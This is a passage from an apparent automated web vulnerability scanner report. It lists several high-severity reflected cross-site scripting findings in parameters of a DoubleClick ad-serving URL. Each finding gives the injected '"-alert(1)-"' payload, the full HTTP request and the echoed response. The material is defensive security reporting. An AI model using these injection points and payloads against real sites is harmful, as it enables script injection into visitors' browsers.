This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261526cf"-alert(1)-"81137346fbf&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:55 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261526cf"-alert(1)-"81137346fbf&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2
...[SNIP]...

5.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c8ef"-alert(1)-"b4f927ee1c1 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=93c8ef"-alert(1)-"b4f927ee1c1&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:30:18 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=93c8ef"-alert(1)-"b4f927ee1c1&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.
...[SNIP]...

5.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4923"-alert(1)-"ebec3c9a8ba was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015c4923"-alert(1)-"ebec3c9a8ba&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:29:30 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015c4923"-alert(1)-"ebec3c9a8ba&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tra
...[SNIP]...

5.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32208"-alert(1)-"6f12c107eb7 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=207955032208"-alert(1)-"6f12c107eb7&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:28:44 GMT
Content-Length: 10042

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
om%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=207955032208"-alert(1)-"6f12c107eb7&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritr
...[SNIP]...

5.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd7b5"-alert(1)-"797fb70d979 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261bd7b5"-alert(1)-"797fb70d979&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:26:43 GMT
Content-Length: 10042

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261bd7b5"-alert(1)-"797fb70d979&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed
...[SNIP]...

5.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b32"-alert(1)-"ef983b9ef6f was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=11